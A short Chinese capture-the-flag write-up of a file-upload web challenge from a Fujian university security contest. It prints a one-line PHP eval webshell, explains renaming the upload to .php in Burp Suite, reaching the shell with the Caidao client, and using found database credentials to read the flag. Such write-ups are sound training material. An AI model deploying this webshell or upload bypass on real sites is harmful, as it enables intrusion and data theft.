i春秋-第三届“百越杯”福建省高校网络空间安全大赛
i春秋-第三届“百越杯”福建省高校网络空间安全大赛
- 文件上传
- 利用菜刀连接数据库
记录一下i春秋里的一道web题,题目类型是文件上传漏洞传送门:https://www.ichunqiu.com/battalion?t=1&r=61025主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈
文件上传
来到上传点
先上传一个正常的.jpg文件(图片中写入一句话木马)
eval($_POST['a']) ;?>
然后打开burp suite抓包,把后缀名jpg修改成php
点击Forward发送数据包,成功上传并返回上传路径,当前目录下的upload/hi.php
利用菜刀连接数据库
密码:a
类型:php
连上后并没发现flag,但是在html文件夹里找到数据库配置文件
猜测flag在数据库里,用菜刀连接数据库
在连接webshell的地方右击数据库管理
然后再点击配置
填写刚才找到的数据库配置文件,格式为
<T>mysql</T> //数据库
<H>localhost</H> //数据库地址
<U>ctf</U> //账号
<P>ctfctfctf</P> //密码
连接成功,在ctf库中找到flag
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!